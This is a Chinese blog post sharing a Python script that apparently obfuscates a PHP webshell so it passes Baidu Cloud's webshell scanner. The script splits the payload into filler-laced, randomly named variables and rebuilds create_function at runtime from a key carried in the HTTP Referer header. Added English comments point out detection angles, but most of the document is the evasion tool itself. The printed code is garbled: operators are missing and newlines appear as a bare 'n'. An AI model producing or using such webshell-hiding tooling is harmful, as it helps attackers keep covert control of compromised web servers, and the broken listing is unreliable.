分享一个PHP免杀脚本 可以过百度云Webshell检测

2023-04-27 10:51:38 浏览数 (1)

过不了阿里云的检测。原理来自 Weevely 工具。

#!/usr/bin/python3
import random
import string

 
# Filler ("interference") token that the script mixes into the payload text.
# NOTE(review): this listing shows extraction damage and does not parse as
# printed; the code tokens are left exactly as the page has them.
add_interfere_str='CnM' 
# Referer value tied to the generated file: the filler token is the third
# dot-separated field of the URL (index 2 after splitting on '.').
Referer = 'https://developer.mozilla.'  add_interfere_str  '.org/testpage.html'
# Text written into the output file as a PHP comment recording that Referer.
notice = '//连接Referer:'   Referer 

# Author's usage note: requests to the generated file must carry the Referer
# above (author's example: https://developer.mozilla.sTr.org/testpage.html,
# where sTr stands for the filler token that is filtered out afterwards).
# Detection angle: the trigger is visible in HTTP logs as a Referer whose host
# carries an extra label between "mozilla" and "org".
 
def read_check():
    """Load the input PHP file and return its text with the PHP tags stripped.

    Reads 'shell.php' as UTF-8, joins the lines, rewrites single quotes to
    double quotes and applies two further replace() calls. When the text starts
    with '<?php' the opening and closing tag characters are stripped with
    lstrip/rstrip; otherwise a message is printed. The text is returned in
    both cases.
    """
    # Input path; the author's comment says to replace shell.php with the name
    # of the file to be converted. The handle is never closed in this function.
    open_file = open('shell.php', 'r',encoding='utf-8')
    read_file = open_file.readlines()
    file = ''.join(read_file)  
    # Single quotes become double quotes; presumably so each fragment can later
    # be wrapped in single quotes by var_name -- TODO confirm.
    file = file.replace("'", '"').replace('n', '').replace('t', '')
    if file.startswith('<?php'):  
        file = file.lstrip('<?php')
        file = file.rstrip('?>')
    else:
        # Message text means "this is not PHP code"; execution continues anyway.
        print('这不是php代码')
    return file
 
def interfere(file):
    """Mix the filler token into the text, then cut the result into chunks.

    The first loop walks the input character by character and, at a fixed
    interval, joins the pending characters with the module-level
    add_interfere_str. The second loop cuts the resulting string into pieces
    bounded by the 80-character counter. Returns the list of pieces.

    Detection angle: the filler is a constant, so the same short token recurs
    at regular intervals inside every string literal of the generated file.
    """
    add_str = ''
    rest_str = ''
    num = 0
    for i in file:
        num  = 1
        if num == 3:   # filler interval of 3 characters (author: adjustable)
            add_results = add_interfere_str.join(rest_str)
            add_str  = add_results
            rest_str = ''
            num = 0
        rest_str  = i
    add_str  = rest_str
 
 
    temp_str = ''
    array_str = []
    for i in add_str:
        num  = 1
        if num == 80: # split point every 80 characters (author: adjustable)
            array_str.append(temp_str)
            temp_str = ''
            num = 0
        temp_str  = i
    # Whatever remains after the last split point becomes the final chunk.
    array_str.append(temp_str)
    return array_str
 
def var_name(array_str):
    """Build one PHP assignment statement per chunk.

    For every chunk a name of three distinct ASCII letters is drawn with
    random.sample and a statement of the form $name='chunk'; is assembled.
    Returns a tuple (list of statements, list of the names used).

    Detection angle: the output is a run of three-letter variables, each
    assigned one single-quoted string fragment.
    """
    var_collect = []
    array_add = []
    for c in array_str:
        # random.sample draws without replacement, so the 3 letters differ.
        random_str = ''.join(random.sample(string.ascii_letters, 3))
        add_sentence = '$'   random_str   '='   "'"   c   "'"   ";"
        array_add.append(add_sentence)
        var_collect.append(random_str)
    return array_add,var_collect
 
def splicing(var_collect):
    """Return a PHP expression that concatenates the given variables.

    Each name contributes a '.$name' piece; the leading '.' is removed at the
    end, giving an expression of the form $a.$b.$c.
    """
    splicing_sentence = ''
    for i in var_collect:
        var_sentence = '.'   '$'   i
        splicing_sentence  = var_sentence
    # Drop the '.' that precedes the first variable.
    final = splicing_sentence.lstrip('.')
    return final
 
def str_print(array_add,final):
    """Append the generated PHP text to 'bypass.php'.

    The file is opened in append mode three times: for a header, for the
    per-chunk assignment statements in array_add, and for a trailer built
    around the concatenation expression `final`. Returns nothing.

    What the emitted PHP does, per the string literals below:
      * reads $_SERVER['HTTP_REFERER'], splits it on '.', and takes field [2]
        as the filler token;
      * removes that token with str_replace() from the concatenated fragments
        and from a padded spelling of the name create_function;
      * invokes the recovered name through $GLOBALS['k'] and then calls the
        result through $GLOBALS["bb"].

    Detection angle: neither the payload nor the function name appears in
    clear text, so signature matching on those strings misses the file. The
    combination of a Referer-derived value fed to str_replace() and a variable
    function call through $GLOBALS remains visible statically, and the
    Referer with the extra host label is visible in request logs.
    create_function() was deprecated in PHP 7.2 and removed in PHP 8.0, so the
    emitted file depends on an older interpreter.
    """
    fileName='bypass.php'
    a ='<?php'
    b = "$b =$_SERVER['HTTP_REFERER'];"
    c = "$c = explode('.',$b);"
    # The module-level notice string is written into the file as a PHP comment.
    Tips = notice
    interfere_str = "$interfere_str =$c[2]; "
    aosp = a 'n' Tips 'n' b 'n' c 'n' interfere_str
    # Append mode: output from an earlier run of the script is not truncated.
    with open(fileName,'a',encoding='utf-8')as file:
        file.write(aosp)
        # Redundant: the with-statement already closes the file.
        file.close()

    for i in array_add:
        with open(fileName,'a',encoding='utf-8')as file:
            file.write('n' i)
            
    file.close()
 
    # Author's note: the PHP variable names below are arbitrary and replaceable.
    l = "$l"   "="   "str_replace($interfere_str,'',%s);" % (final)
    k = "$k=str_replace($interfere_str,'','cre%sat%se_fu%snc%stio%sn');" % (add_interfere_str,add_interfere_str,add_interfere_str,add_interfere_str,add_interfere_str)
    bb = "$bb = $GLOBALS['k']('',$l); "
    ee = '$GLOBALS["bb"]();'
    abvd = l 'n' k 'n' bb 'n' ee 'n' '?>'
    
    with open(fileName,'a',encoding='utf-8')as file:
        file.write(abvd)
        file.close()
 
def main():
    """Run the pipeline: read the input, mix in the filler, emit the PHP file."""
    file = read_check()
    array_str = interfere(file)
    array_add,var_collect = var_name(array_str)
    final = splicing(var_collect)
    # Side effect: appends to bypass.php in the current working directory.
    str_print(array_add,final)
    
# Script entry point: runs main() only when the file is executed directly.
if __name__ == '__main__':
    main()
